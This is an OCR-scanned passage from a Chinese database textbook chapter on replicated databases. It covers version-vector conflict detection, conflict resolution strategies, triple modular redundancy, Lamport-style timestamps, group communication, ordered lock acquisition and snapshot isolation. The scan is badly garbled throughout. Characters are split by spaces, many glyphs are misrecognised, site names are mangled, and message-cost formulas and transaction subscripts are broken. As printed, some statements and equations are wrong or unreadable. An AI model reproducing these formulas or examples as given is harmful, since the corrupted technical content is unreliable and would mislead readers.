x 的 版 本 有 (1, 2, 1)。 

为 了 检查 冲突 ， 结 点 之 间 交 换 它们 的 版 本 并 互相 比较 版 本 向 量 。 为 交换 版 本 ， 结 点 广播 
它 自己 的 版 本 和 所 有 接收 到 的 版 本 。 这 样 做 增 大 了 每 一 结 点 收 全 所 有 版 本 的 可 能 性 。 例 如 ， 
如 果 结 点 Si; 能 与 $; 通信 ， 但 不 能 与 S: 通信 , 但 $; 能 与 $; 通信， 那么 $; 通 过 S, 即 能 接收 
Si 的 版 本 。 结 点 一 旦 接收 到 一 个 版 本 ， 其 中 的 版 本 向 量 即 与 对 应 数据 项 在 本 地 的 最 新 版 本 癌 
量 进行 比较 。 通 过 比较 来 确认 ， 版 本 向 量 V 是 否 履 盖 同样 的 结 点 集合 〈 向 量 长 度 是 否 相等 )， 
以 及 对 于 每 个 下 标 i， 是 否 都 有 V[i 宇 V [i 让，V "是 该 数据 项 在 本 地 的 最 新 版 本 向 量 。 如 果 
确认 通过 ， 称 V 统治 V”。 如 果 谁 也 不 统治 谁 ， 则 称 V 与 V” 不 相 容 ， 出 现 了 复制 冲突 。 作 
为 一 个 例子 ， 看 图 26-14， 最 初 在 三 个 结 点 S11、S; 和 S3 上 x 的 版 本 均 为 (0, (3, 1), (1, 1, 1))， 
是 结 点 $3 最 后 写 的 x=0 并 产生 版 本 1。 现 在 S; 和 S; 并 发 修改 x, 写 新 的 版 本 并 将 新 版 本 送 
给 S:。S: 从 Si 处 接收 版 本 立即 开始 确认 。 由 于 接收 到 的 版 本 都 大 于 等 于 x 本 地 版 本 向 量 ， 
即 (2, 1, 1)>(1, 1, 1), S; 后 级 上 &x 的 新 版 本 并 把 新 版 本 送 给 S; (通常 S; 应 该 向 除 Si 以 外 的 所 
有 结 点 广播 )。 现 在 S$; 又 接 到 来 自 $; 的 版 本 ， 再 比较 版 本 向 量 。 这 次 发 现 了 冲突 ， 因 为 谁 
也 不 统治 谁 ， 它 们 不 相 容 。Si 将 丢失 S; 的 更 新 ， 反 过 来 也 一 样 。 假 设 $; 的 版 本 向 量 统治 S， 
的 ， 比 如 (2, 1, 2) 统治 (2, 1, 1)， 那 么 就 不 出 现 冲 突 ， 表 明 S; 看 见 了 Si 的 更 新 。 Si 不 知道 
出 现 了 冲突 ， 因 为 它 还 没 看 见 $3 的 版 本 。 为 了 让 所 有 结 点 都 知道 出 现 冲突 , $: 把 $; 的 版 本 
传 给 Sis 

重要 的 是 明白 冲突 检查 还 要 求 冲 突 消 解 ， 称 为 调停 (reconciliation )。 调 停 是 又 一 个 环 
节 ， 需 要 不 同 的 机 制 。 一 种 简单 的 机 制 依赖 数据 项 的 语义 ， 下 节 讨 论 。 
冲突 消解 (Conflict resolution ) 

提出 过 多 种 消解 冲突 的 机 制 ， 最 常用 的 有 下 列 : 

@ 最 早 和 最 晚 时 间 惟 : 使 用 其 对 应 数据 具有 最 早 或 最 晚 时 间 惟 的 更 新 。 

e 结 点 优先 权 : 使 用 来 自 最 高 优先 权 结 点 的 更 新 。 

@ 累加 和 平均 类 更 新 : 交换 地 使 用 更 新 。 这 类 冲突 消解 能 用 于 对 属性 具有 累加 形式 修 
改 的 地 方 ; 例如 : salary=salary+ x。 

最 小 和 最 大 值 : 使 用 这 样 的 修改 ， 其 对 应 的 属性 具有 最 小 值 或 最 大 值 。 
用 户 自 定义 : 允许 DBA 提供 一 个 用 户 自 定义 的 过 程 ， 用 于 消解 冲突 。 
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对 于 不 同类 型 的 冲突 可 能 有 不 同 的 过 程 。 
e 保存 手工 消解 : 在 DBA 错误 日 志 中 记录 下 冲突 ， 以 后 再 复查 并 手工 消解 。 





Site S; Site S> Site Sa 


Initially: x = (0,(3,1),(1,1,1)) Initially: x = (0,(3,1),(1,1,1)) Initially: x = (0,(3,1),(1,1,1)) 
T1:x = x+1 T2: x = x+2 
x=(1,(1,2),(2,1,1)) x = (2,(3,2),(1,1,2)) 

Send: x = (1,(1,2),(2.1,1)) Send: x = (2,(3,2),(1,1,2)) 





Receive: x = (1,(1,2),(2,1,1)) 
x=(1,(1,2),(2,1,1)) 

Send: x = (1,(1,2),(2,1,1)) 
Receive: x = (2,(3,2),(1,1,2)) 


x = {(1,(1,2),(2,1,1)), 
(2,(3,2),(1,1,2))} 


Receive: x = (2,(3.2).(1,1,2)) Send: x = (2,(3,2),(1,1,2)) Receive: x =(1,(1,2),(2,1,1)) 


= {(1,(1,2),(2,1,1)), 
x={(1,(1,2),(2,1,1)), x 
(2,(3,2),(1,1,2))} (2,(3,2),(1,1,2))} 





图 26-14 使 用 版 本 向 量 进行 冲突 检查 (Bernstein and Newcomer 2009 ) 


某 些 系统 也 解决 因 破坏 主 关键 字 或 唯一 性 约束 而 导致 的 冲突 ， 例 如 : 

® 在 复制 值 上 附 上 了 结 点 名 : 把 源 结 点 的 全 局 数据 库 名 附 在 复制 的 属性 值 上 。 

e 在 复制 值 上 附 上 了 顺序 号 : 把 顺序 号 附 在 复制 的 属性 值 上 。 

e 丢弃 重复 值 ; 在 源 结 点 上 丢弃 引起 错误 的 记录 。 

很 明显 ， 如 果 冲 突 消 解 基于 时 间 戳 ， 那 参与 复制 的 几 个 结 点 的 时 间 戳 必须 包含 时 区 元 素 
或 者 基于 同一 时 区 。 例 如 ， 数 据 库 服务 器 可 能 按 格林 威 治 时 间 (GMT) 或 其 他 某 种 别 的 可 接 
受 时 区 ， 最 好 是 不 遵守 夏令 时 的 。 如 果 调 停 不 可 行 ， 则 需 人 的 介入 ， 手 工 消解 冲突 。 另 一 种 
假设 是 ， 越 久 不 发 生 调 停 ， 不 能 消解 冲突 的 可 能 性 越 高 。 
恢复 

纵然 每 个 结 点 都 是 主 结 点 ， 这 种 模式 的 恢复 也 更 困难 ， 特 别 是 由 于 懒惰 传播 而 要 重 构 
最 近 的 状态 。 如 果 一 个 结 点 在 其 更 新 传播 出 去 之 前 就 故障 了 ， 那 更 新 全 都 丢失 了 。 解 决 这 个 
问题 的 唯一 办 法 是 用 一 个 或 多 个 另外 的 结 点 后 援 每 一 结 点 ， 并 且 积 极地 将 更 新 传播 到 后 援 结 
点 。 这 表示 对 辅 结 点 懒惰 传播 与 对 专用 后 援 结 点 积极 传播 的 一 种 权衡 。 不 像 前 一 模式 ， 在 网 
络 分 区 的 情况 下 ， 不 要 求 多 数 一 致 ， 因 为 一 个 结 点 在 更 新 传播 到 它 之 前 可 能 总 与 其 他 结 点 相 
异 。 要 求 多 数 的 原因 是 为 了 减少 调停 的 次 数 ， 而 懒惰 传播 未 到 达 所 有 结 点 的 时 间 越 长 ， 需 要 
调停 的 可 能 性 越 高 ， 调 停 不 成 功 的 可 能 性 也 越 高 。 

虽然 这 种 模式 要 求 额外 、 高 昂 的 机 制 来 维持 一 致 性 ， 许 多 数据 库 还 是 提供 这 样 的 复制 
技术 。 存 在 这 样 一 类 应 用 场景 ,数据 主要 在 本 地 使 用 ， 按 时刻 表 (比如 每 天 晚上 ) 同步 更 新 
就 足 侨 。 此 外 ， 移 动 应 用 断 链 时 就 用 本 地 的 数据 库 。 连 接 重建 后 ， 再 与 基站 数据 库 同 步 所 做 
修改 。 

在 面向 服务 结构 (SOA) 中 , 为 了 增强 服务 的 重用 性 ， 服 务 自治 事 关 重要 。 类 似 于 移动 
应 用 ， 服 务 也 可 能 就 用 自己 的 本 地 数据 库 ， 再 与 其 他 服务 或 基础 数据 库 同步 更 新 。 

版 本 向 量 是 一 种 合适 的 检查 冲突 的 方法 ,但 当 结 点 数目 增加 时 它 可 能 变 得 很 大 。 如 果 结 
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点 数据 未 知 或 变化 频繁 (例如 ， 移 动 自 组 织 网 络 )， 在 向 量 中 把 版 本 的 位 置 与 结 点 标识 符 关 
联 的 想法 就 不 再 行 得 通 。 

每 一 种 冲突 都 不 可 能 调停 ， 而 不 得 不 用 一 个 专门 节 ( section) 处 理 ， 这 将 造成 其 他 事务 
等 待 。( 注 意 ， 节 是 个 类 属 概 念 ， 表 示 若 干 条 像 分 支 、 循 环 这 样 的 指令 ， 在 此 一 个 节 指 实现 
调停 要 求 的 所 有 指令 。) 如 果 仅 允许 一 个 事务 (进程 ,线程 ) 进入 的 节 是 关键 的 ， 通常 采用 
互 斥 ( 锁 ) 机制 控制 对 关键 节 的 访问 。 

至 于 一 致 性 ， 如 果 复 制 技术 提供 了 冲突 检查 和 消解 (包括 人 的 介入 )， 懒 惰 更 新 传播 的 
随处 更 新 为 最 终 一 臻 的。 对 单个 事务 ,采用 线性 交互 的 消息 开销 估算 为 (n- 1)*(2m+1)+6(m 
次 更 新 *n-1 个 远程 结 点 ，n-1 同意 ，m 次 更 新 *n-1 次 版 本 交换 ，5 调停 )， 采 用 固定 交互 的 
消息 开销 为 3n-3+6 (n-1 次 更 新 传播 ，n-1 次 同意 ，n-1 次 版 本 交换 ，5 调停 )。 这 种 模式 的 
缺点 是 : 

e 每 类 冲突 都 不 可 能 调停 。 

e 调停 失败 需 人 的 介入 以 解决 冲突 。 

e 故障 情况 下 ， 未 传播 的 修改 全 都 丢失 。 

该 模式 的 优点 是 : 

。 由 于 懒惰 更 新 提高 了 性 能 。 

e 结 点 高 度 自治 。 


26.3.5 “使 用 统一 全 序 广 播 的 随处 更 新 


本 节 提 出 在 线性 交互 的 ROWA 方法 中 使 用 统一 全 序 广播 。 该 模式 如 图 26-15 所 示 。 为 
了 和 弄 清 起 因 ， 先 考虑 一 下 三 模 元 余 (TMR) 系统 (Pittelli and Garcia-Molina, 1989 )，TMR 是 
为 像 飞 机 一 类 高 可 靠 系统 开发 的 。 在 TMR 系统 中 ， 任 一 命令 都 由 三 个 独立 的 处 理 器 处 理 ， 
故而 得 名 。TMR 系统 中 的 代表 (delegate) 总 是 把 一 条 命令 (或 操作 ) 发 给 三 个 处 理 器 ,使 
得 每 一 处 理 器 都 以 同样 的 顺序 处 理 同样 的 命令 。 处 理 器 一 旦 处 理 完 命令 ， 即 把 结果 发 给 投票 
器 (voter)。 投 票 器 选 出 多 数 相 同 的 结果 返回 给 客户 端 或 传递 给 下 一 步 处 理 。 一 个 TMR 系统 
肯定 是 一 致 的 ， 因 为 每 一 个 处 理 器 都 以 相同 的 顺序 处 理 每 一 条 命令 ( 读 和 写 )。 总 之 ， 这 一 
类 系统 的 性 质 是 : 

(1 ) 每 一 个 处 理 器 做 同样 多 的 工作 。 

(2 ) 所 有 操作 ( 读 、 写 、 开 始 和 结束 ) 都 以 同样 的 顺序 处 理 。 

(3 ) 由 于 (2 )， 系 统 是 一 致 的 (无 拜占庭 式 失败 ， 即 处 理 器 不 撒谎 )。 

(4) 系统 只 能 容 单 个 结 点 故障 。 

(5 ) 3 是 实现 少数 服从 多 数 要 求 的 处 理 器 最 小 数目 ， 这 类 系统 要 求 处 理 器 数目 为 奇数 。 

(6 ) 增加 处 理 器 数目 可 提高 容错 能 力 。 

TMR 系统 的 概念 也 可 用 于 复制 数据 库 。 但 这 需要 小 心地 扩展 和 使 用 。 与 总 有 一 个 固定 
代表 的 TMR 相 比 ， 随 处 更 新 结构 的 每 一 结 点 都 可 充当 代表 。 因 此 在 这 种 模式 中 维持 顺序 更 
富 挑战 。 只 有 一 个 代表 的 TMR 系统 中 ， 用 FIFO 的 消息 发 送 就 能 实现 相同 的 顺序 ， 但 在 随 
处 更 新 结构 中 维持 所 有 操作 的 顺序 是 个 “多 对 多 ”的 问题 。 首 先 遇 到 的 问题 就 是 各 本 地 时 钟 
可 能 产生 相等 的 时 间 惟 ， 使 得 排序 成 为 不 可 能 。 在 TMR 系统 中 读 也 由 所 有 处 理 器 处 理 。 这 
在 复制 数据 库 的 情况 下 ， 显 然 不 是 一 个 推荐 的 做 法 ， 它 将 极 大 地 增加 消息 开销 。 在 ROWA 
或 ROWAA 方 法 中 ， 读 都 只 会 在 一 个 结 点 上 进行 ， 本 地 读 可 能 与 全 局 写 发 生 冲 突 。 
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图 26-15 ” 带 统一 完全 序 广播 的 随处 更 新 


时 间 惟 排序 (timestamp ordering) 

在 22.2.5 节 曾 讨论 过 时 间 戳 用 于 集中 数据 库 的 情况 。 设 置 时 间 蕉 的 目标 就 是 给 事务 排 
出 一 个 全 局 的 序 ， 以 使 得 老 一 些 (时 间 惟 更 小 ) 的 事务 在 冲突 中 优先 权 更 高 。 在 分 布 式 环境 
下 ， 还 需要 产生 的 时 间 惟 在 本 地 和 全 局 均 具有 唯一 性 。 很 明显 ， 正 如 22.2.5 节 提 出 的 那样 ， 
在 每 个 结 点 上 使 用 系统 时 钟 或 增 量 式 事件 计数 器 是 不 合适 的 。 不 同 结 点 的 时 钟 可 能 不 同步 。 
同样 ， 若 用 事件 计数 器 ， 不 同 结 点 也 可 能 产生 同一 个 计数 值 。 在 分 布 式 DBMS 中 ， 一 般 的 
方法 是 把 本 地 时 间 戳 与 唯一 的 结 点 标识 符 关联 起 来 < 本 地 时 间 戳 , 结 点 标识 符 > ( Lamport， 
1978 )。 结 点 标识 符 放 在 最 不 重要 的 地 方 ， 目 的 是 使 事件 能 按照 它们 的 出 现 而 不 是 位 置 来 排 
序 。 为 了 阻止 繁忙 的 结 点 比 空闲 的 结 点 产生 的 时 间 戳 更 大 ， 结 点 之 间 会 同步 时 间 戳 。 每 一 
个 结 点 在 发 送 结 点 间 消 息 时 都 带 上 它 的 时 间 戳 。 每 个 结 点 接受 到 消息 ， 都 会 将 消息 中 的 时 间 
戳 与 自己 的 时 间 戳 比较 ， 如 果 发 现 自己 的 时 间 戳 较 小 ， 立 即将 其 置 为 某 个 大 于 消息 时 间 戳 的 
值 。 例 如 ， 若 当前 时 间 惟 为 <10, 1> 的 结 点 Si 发 送 一 条 消息 给 当前 时 间 崔 为 <15, 2> 的 结 点 
Ss, S; 的 时 间 戳 不 用 改动 。 但 车 此 时 S$: 的 时 间 戳 为 <5, 2> ， 则 立即 改 为 <11, 2>。 

组 通信 协议 

在 分 布 式 计算 中 ， 组 通信 协议 (group communication protocol) 用 于 保证 即使 在 故障 ( 例 
如 消息 丢失 ) 情况 下 ， 消 息 最 终 也 会 以 广播 该 消息 的 结 点 所 设置 的 某 种 序 (例如 完全 序 ) 送 
达到 组 内 所 有 非 故障 的 成 员 。 组 通信 和 层 位 于 标准 的 点 对 点 与 应 用 层 之 间 。 应 用 进程 之 间 通 常 
通过 所 提供 的 接口 通信 ， 所 有 使 用 这 一 层 的 应 用 进程 联合 形成 一 个 组 ， 一 起 完成 某 项 任务 ， 
比如 建 一 个 复制 数据 库 。 组 通信 层 提供 下 列 功能 (Kemme 等 人 ，2010 ): 

e 成 员 关 系 (membership)。 一 个 视图 (view) 表示 出 组 内 当前 连接 并 活跃 的 进程 ， 进 

程 能 单方 面 地 决定 加 入 或 离开 一 个 组 。 因 为 进程 可 能 失败 ， 组 通信 层 本 身 应 能 检测 
进程 是 否 出 了 故障 ， 若 是 出 了 故障 则 将 其 移出 该 组 。 若 组 内 成 员 发 生变 化 要 通知 其 
他 组 员 。 

e 多 路 传播 ( multicast)。 组 通信 层 提供 可 靠 的 多 路 传播 实现 ， 它 使 得 各 成 员 能 定制 可 

靠 性 和 消息 提交 顺序 。 
昌 可 靠 性 : 组 通信 层 提 供 两 种 不 同 的 设置 : 
e 可 靠 广播 (reliable broadcast) : 一 条 消息 只 要 能 传送 到 了 一 个 正确 进程 ， 就 能 传送 到 
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所 有 正确 进程 。 

统一 可 靠 广播 (uniform reliable broadcast): 如 果 一 条 消息 能 传送 到 任何 一 个 进程 (无 
论 正确 还 是 故障 )， 就 保证 能 传送 到 所 有 正确 进程 。 复制 数 据 库 要 求 该 设置 。 

里 消息 的 顺序 : 消息 能 按 不 同 顺序 送 达 : 

任意 顺序 。 

FIFO 顺序 : 若 某 进程 以 Mi 一 Ma 的 顺序 送出 消息 ， 所 有 进程 也 以 这 样 的 顺序 接收 到 
消息 。 

e 因果 顺序 (causal order): 如 果 消 息 Mi 按 因果 关系 应 该 排 在 M: 之 前 ,那么 在 所 有 结 

点 上 Mi 应 在 Mz 之 前 提交 。 因 果 顺 序 是 根据 因果 依赖 对 FIFO 的 可 传递 扩展 。 

e 全 序 (total order) : 所 有 消息 按 相同 的 顺序 传送 给 所 有 成 员 ， 而 不 管 是 谁 发 送 的 。 
ROWA 方法 要 求 该 设置 。 

e 虚 同 步 (virtual synchrony) : 虚 同 步 是 组 变化 (视图 ) 与 消息 传送 之 间 的 粘 合 剂 。 例 
如 ， 进 程 PE、P: 和 P3 建 了 个 组 。 现 在 P; 出 了 故障 ， 组 通信 层 一 旦 发 现 该 结 点 故障 ， 
它 立 即 向 组 里 发 送 一 条 视图 变化 消息 VC。 如 果 Pi 在 接收 到 任何 一 条 消息 (比如 ，P， 
的 更 新 ) 之 前 接收 到 VC， 它 知道 P; 在 发 这 条 消息 之 前 也 接收 到 VC。 一 段 时 间 后 ， 
比如 说 在 时 刻 tt，P; 复活 并 要 再 加 入 这 个 组 。P; 要 做 的 第 一 件 事 就 是 实施 从 发 生 故 
障 那 一 刻 t 到 这 一 段 时 间 内 错过 的 所 有 更 新 。 假 设 到 时 刻 已 ， 它 完成 了 这 些 更 新 。 
然而 在 此 期 间 , Pi 和 P; 仍 在 进行 处 理工 作 ，P: 又 错失 掉 某 些 更 新 。P3 能 请 求 再 实施 
它们 ,但 需要 一 种 机 制 使 得 P 避免 多 次 请 求 相同 的 更 新 。 解 决 这 个 问题 的 一 种 保证 
能 终止 的 办 法 是 ，P; 实施 完 大 部 分 更 新 的 时 修 即 通知 组 通信 层 。 组 通信 层 发 送 一 条 
视图 变化 消息 (VC)， 此 后 处 理 的 所 有 更 新 都 将 同时 送 给 P;。 不 得 不 如 此 来 保障 P 
接收 到 直到 VC 送出 之 前 错失 的 所 有 更 新 。 

组 通信 作为 一 种 基础 协议 被 提出 ， 试 图 减弱 故障 检测 、 排 序 和 消息 传送 保障 与 实际 并 发 
控制 协议 之 间 的 联系 。 组 成 员 关 系 能 反映 故障 结 点 或 新 结 点 加 入 复制 数据 库 的 痕迹 ， 保 证 为 
实现 1CSR (或 其 他 隔离 形式 ) 而 要 求 的 全 序 。 

前 面 已 提 过 ， 在 每 个 结 点 都 执行 读 消 息 不 是 一 个 妥善 方案 。 如 果 我 们 假设 是 在 每 个 结 点 
执行 读 消息 ， 那 么 每 个 结 点 将 以 同样 顺序 做 同样 的 工作 。 这 样 做 的 结果 是 投票 阶段 多 余 ， 因 
为 如 果 在 某 个 结 点 引发 了 一 个 异常 (例如 ， 某 个 完整 约束 条 件 不 满足 )， 该 异常 在 其 他 结 点 
也 将 引发 。 而 且 ， 如 果 一 个 结 点 因为 硬件 故障 而 失效 ， 组 通信 层 会 检测 到 该 故障 ， 迫 使 该 结 
点 离开 该 组 。 即 便 省 略 掉 投 票 阶段 后 是 一 种 可 能 的 方案 ， 它 也 仅 当 在 每 个 结 点 都 执行 读 时 才 
可 行 。 如 果 仅 能 在 一 个 结 点 检测 到 读 写 冲突 ， 这 是 ROWA 方案 所 能 做 的 ， 则 无 法 维持 一 致 
性 。 一 个 结 点 可 能 因为 某 种 原因 ， 比 如 共享 锁 阻 塞 了 写 锁 而 超时 ， 单 方面 决定 撤销 一 个 事 
务 。 那 么 ， 或 者 将 每 一 结 点 隔离 级 设 为 SI ( 见 下 节 )， 或 者 限制 操作 为 过 程 调用 。 在 某 些 应 
用 场景 ， 数 据 访 问 可 能 只 能 通过 存储 过 程 完成 。 然 而 ， 即 使 是 存储 过 程 也 不 可 能 在 每 个 结 
点 上 执行 完全 相同 的 行为 。 首 先 ， 它 们 不 得 不 互 斥 地 运行 以 避免 本 地 并 发 冲突 ， 其 次 允许 有 
非 确定 的 效果 。 我 们 不 再 更 多 地 讨论 确定 性 (determinism )， 感 兴趣 的 读者 参见 Thomson 和 
Abadi (2010) 近期 在 该 领域 的 工作 。 进 而 ， 省 略 投票 阶段 并 不 意味 着 就 没有 了 关于 收 到 消息 
的 回答 。 组 通信 要 求 结 点 接受 到 消息 后 必须 回答 。 有 了 回答 才 使 得 组 通信 和 层 能 保证 所 有 结 点 
都 以 特定 的 顺序 、 同 样 的 方式 接受 了 消息 。 然 而 ， 可 靠 的 多 路 传播 比 2PC 更 快 ， 因 为 它 不 
实现 在 应 用 层 并 且 不 要 求 应 用 层 和 通信 层 之 间 的 ( 反 ) 串 行 。 总 之 ， 在 ROWA 模式 中 要 求 投 
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票 是 因为 结 点 可 能 因 本 地 串 行 冲突 而 单方 面 决定 撤销 一 个 事务 。 
排序 锁 获 取 (ordered lock acquisition ) 

本 节 讨 论 排序 锁 获 取 ， 它 使 得 死 锁 检 测 不 再 必要 ， 并 且 能 减少 通信 开销 。 重 要 的 是 ， 它 
是 解决 当 结 点 数 增 至 n 时 ， 死 锁 可 能 性 增 至 mw 这 个 问题 的 一 种 途径 。 正 如 稍 后 说 明 的 那样 ， 
排序 锁 获 取 不 能 用 于 本 节 前 面 所 述 模式 。 然 而 为 了 更 好 地 理解 存在 的 挑战 ， 在 此 我 们 先 讨论 
它 ， 在 下 节 将 给 出 一 种 能 用 到 排序 锁 获 取 的 技术 。 

正如 25.3 节 讨 论 的 那样 ， 在 多 个 结 点 加 锁 ， 即 使 本 地 无 死 锁 ， 也 可 能 引起 全 局 死 锁 。 
假设 在 结 点 $1 锁 的 顺序 为 x 一 y， 而 在 结 点 S$: 为 y 一 x， 归 并 这 两 个 锁 图 就 导致 全 局 锁 图 中 
出 现 环 。 一 张 图 若 能 进行 拓扑 排序 就 肯定 无 环 。 因 此 ， 可 要 求 在 每 一 结 点 上 锁 都 须 按 预 先 确 
定 的 次 序 获取 。 以 操作 的 次 序 作为 获取 锁 的 次 序 并 不 能 预防 死 锁 ， 这 倒是 有 可 能 作为 全 序 广 
播 的 一 项 有 用 的 副作用 。 例 如 ， 假 设 有 事务 T= 二 (wi(x), wi(y)) 和 事务 T: 王 (wz(y)，wz(x)), 若 
按 操作 次 序 获 取 锁 将 导致 死 锁 。 正 如 在 22 章 讨 论 的 那样 ， 改 变 事务 操作 的 顺序 又 会 违反 事 
务 本 身 的 因果 序 ， 可否 在 wi(y) 和 wz(y) 之 前 广播 操作 wi(x)。 诚 然 ， 若 Ti 以 x 一 y 的 次 序 获 
得 锁 ，T; 也 以 该 次 序 获得 锁 ， 就 不 可 能 出 现 死 锁 。 那 么 条 件 是 : 若 按 全 局 锁 次 序 加 锁 请 求 未 
准许 ， 请 求 的 事务 就 不 得 不 等 待 直至 准许 。 这 样 一 个 序 不 得 不 依据 唯一 且 可 排序 的 关键 字 ， 
比如 主 关键 字 与 对 象 标识 符 的 组 合 。 排 序 锁 获 取 只 有 当 改 变 获 取 顺 序 不 影响 操作 顺序 时 才 是 
可 行 的 。 锁 获取 是 相对 的 而 不 在 意 获取 的 时 刻 。 然 而 要 按 预 先 确定 的 顺序 获取 锁 势 必须 事先 
知道 事务 读 集合 与 写 集 合 ， 包 括 隐 含 的 索引 查找 。 若 不 加 这 条 限制 ， 锁 管理 器 就 可 能 准予 数 
据 项 y 上 的 锁 ， 而 无 视 后 续 在 数据 项 x 的 访问 操作 是 否 违反 序 。 因 此 ， 由 于 排序 锁 获 取 仅 当 
事先 已 知 读 、 写 集合 时 才 可 能 ， 所 以 它 是 不 可 用 于 本 节 所 提 模 式 的 ， 除 非 整 个 事务 都 由 这 个 
客户 端 提交 。 这 样 一 种 复制 技术 被 称 为 主动 (active) 或 状态 机 (state machine) 复制 (Pittelli 
和 Garcia-Molina, 1989; Schneider, 1993 )， 在 此 不 更 多 讨论 ， 因 为 它 意味 着 固定 交互 。 用 线 
性 交互 ， 全 局 锁 排 序 是 不 可 能 的 。 

组 通信 和 是 强 有 力 的 解决 模式 。 然 而 ， 当 每 个 结 点 修改 率 都 很 高 时 ， 其 中 负责 排序 和 提交 
广播 消息 的 组 件 可 能 会 成 为 瓶颈 。 此 外 ， 对 于 线性 交互 ， 还 是 没 找 到 解决 死 锁 的 方法 ， 下 一 
节 我 们 会 给 出 一 种 模式 。 根 据 一 致 性 ， 本 节 技 术 产 生 1CSR 调度 。 对 单个 事务 ， 消 息 开销 估 
算 为 (2-1D*(Hm+2)，(7 次 读 +m 次 更 新 ) *n-1 个 远程 结 点 ，n-1 准备 ，n-1 次 投票 。 这 种 模 
式 的 缺点 是 : 

。 排序 消息 耗费 。 

e 死 锁 可 能 性 高 。 

而 该 模式 的 优点 是 : 

e 无 单 点 失效 结 点 且 易 于 恢复 。 

e 早期 进行 冲突 检测 。 

e 组 通信 减弱 了 可 靠 性 、 执 行 顺 序 与 并 发 控制 协议 之 间 的 联系 。 


26.3.6 SI 与 统一 全 序 广播 复制 


上 一 种 技术 的 主要 缺点 是 采用 线性 交互 来 排序 消息 带 来 了 高 开销 。 而 且 该 技术 不 能 解决 
死 锁 问题 。 本 节 讨 论 的 技术 能 克服 这 些 缺 点 。 这 项 技术 也 是 基于 ROWA 模式 ， 但 采用 快照 
隔离 ( snapshot isolation，SI)。 它 也 用 到 上 节 介 绍 的 组 通信 层 提 供 的 统一 全 序 广播 。 它 不 要 
求全 局 死 锁 检测 ， 采 用 固定 交互 极 大 地 减少 消息 开销 ， 从 而 减低 了 排序 的 开销 。 
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快照 隔离 (SID) 

SI 可 与 多 版 本 时 间 惟 排序 并 发 控制 结合 ( 见 22 章 )， 排 除 读 写 冲 突 。 为 实现 这 个 ， 事 务 
总 是 根据 时 间 戳 读 最 近 提 交 的 状态 。 例 如 ， 数 据 项 x 在 时 刻 t 有 值 “格拉 斯 哥 "， 而 在 时 刻 
t 有 值 “ 阿 伯 丁 ”( 我 们 说 x 有 两 个 版 本 ， 一 个 时 刻 一 个 ) 。 一 个 在 b(tt<b<tb) 时 刻 开始 的 事 
务 , 在 (tt>tb) 时 刻 读 在 它 开 始 时 有 效 的 x 的 值 ， 那 应 该 是 ts 时 的 “格拉 斯 哥 "。 如 果 该 事 
务 试图 在 t 时 刻 之 后 修改 x， 则 出 现 冲突 ， 因 为 当前 已 交付 的 某 个 事务 已 在 时刻 修改 x 为 
“ 阿 伯 丁 ”了 ( 见 22.2.6 节 “ 多 版 本 时 间 戳 排序”) 。 

SI 的 缺点 是 它 非 可 串 行 的 。 例 如 ， 给 定 事务 T= 二 (n(x), wi(y)) 和 T= 二 (r2(y), wz(x)),， 调 
度 s 二 (rs(y0), 1(X0);w2(x2), commitz, wi(y1), commit1)， 其 中 x 的 下 标 指 版 本 ， 等 于 写 在 数据 
项 后 面 的 事务 标识 符 。T: 读 yo (下 标 0 表示 最 初版 本 )，T' 读 xo。 接 着 T, 修改 x， 因 无 其 他 
事务 修改 x 即 提交 。 最 后 Ti 写 y 因 无 其 他 事务 并 行 修改 y 亦 提交 。 可 是 用 22.2.2 节 讨 论 的 
可 串 行 测试 规则 ， 发 现存 在 环 。 也 就 是 说 在 SI 下 虽 可 调度 成 功 ， 但 Ti 与 T: 间或 反 过 来 存 
在 读 写 冲 突 。 尽 管 如 此 ， 许 多 数据 库 系 统 还 是 使 用 SI， 例 如 Microsoft SQL Server、Oracle 
和 PostgreSQL， 原 因 是 : (1 ) 对 许多 应 用 这 已 是 足够 强 的 隔离 性 (只 读 事 务 比 更 新 事务 普 
遍 得 多 一 一 近 80:20 ) ; (2 ) 有 办 法 保证 可 串 行 调度 。 这 个 办 法 就 是 组 合 多 版 本 与 锁 ， 使 用 
SELECT FOR UPDATE 语句 。 如 果 T 以 SELECT FOR UPDATE 语句 开始 ， 并 发 控制 协议 
就 会 锁 住 x 和 y， 并 保持 锁 直至 事务 终止 。 这 将 隔离 x 和 y， 其 他 事务 不 可 能 修改 x 或 y， 直 
到 Ti 终止。 不过， 注意 该 方法 在 上 述 调度 进行 时 需 进 行 死 锁 检 测 。 图 26-16 说 明了 该 方法 。 

在 复制 数据 库 中 ，SI 类 似 地 工作 。 一 
个 事务 读 了 任 一 结 点 上 当前 的 快照 ， 该 结 
点 即 变 为 局 部 结 点 (代表 )。 所 有 的 事务 处 
理 均 发 生 在 隔离 的 工作 空间 中 (就 像 在 无 
复制 的 数据 库 中 一 样 )。 事 务 在 私有 空间 
(例如 ， 在 影子 备份 上 ) 的 执行 保持 隔离 
性 ， 它 的 读 写 操作 结果 对 其 他 任何 事务 均 
不 可 见 直 至 验证 成 功 完 成 (验证 是 测试 决 
定 一 个 事务 是 提交 ， 还 是 必须 撤销 )。 事 务 
一 旦 处 理 完 最 后 一 个 操作 ,立即 提取 写 集 
合并 通过 组 通信 层 用 统一 全 序 广播 来 广播 
验证 请 求 。 因 此 , 每 个 结 点 都 以 同样 的 次 
序 接收 到 该 请 求 。 请 求 中 包含 写 集合 及 其 
他 一 些 信息 ， 如 结 点 标识 符 。 一 个 结 点 若 
接受 验证 请 求 ， 它 要 保证 所 有 修改 都 必须 
按 它们 在 初始 结 点 进行 的 次 序 ( 写 集合 中 
必须 反映 出 来 ) 产生 作用 。 否 则 它 不 得 不 
离开 此 组 。 验 证 跟 以 前 在 讨论 “用 版 本 向 
量 检查 冲突 ”时 描述 的 版 本 确认 技术 相同 ， 
关于 确认 的 描述 见 22.2.7 节 。 确 认 就 是 检 
查 请 求 事务 的 写 集合 是 否 与 并 行 终止 的 任 
何其 他 事务 的 写 集 合 有 交集 。 若 发 生 这 样 图 26-16 ”SI 与 统一 全 序 广播 的 随处 更 新 
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的 冲突 ， 打 算 通过 验证 的 这 个 事务 被 撤销 。 重 要 的 是 ， 为 阻止 本 地 并 发 冲突 验证 需 作为 一 个 
原子 部 分 执行 。 

还 要 处 理 这 样 的 情形 ， 来自 两 个 事务 的 一 对 冲突 数据 作为 验证 请 求 的 一 部 分 被 广播 ， 考 
虑 如 下 步骤 : 

e 结 点 S1 和 S; 并 行 ， 分 别 送 出 验证 请 求 Cl 和 C:。 

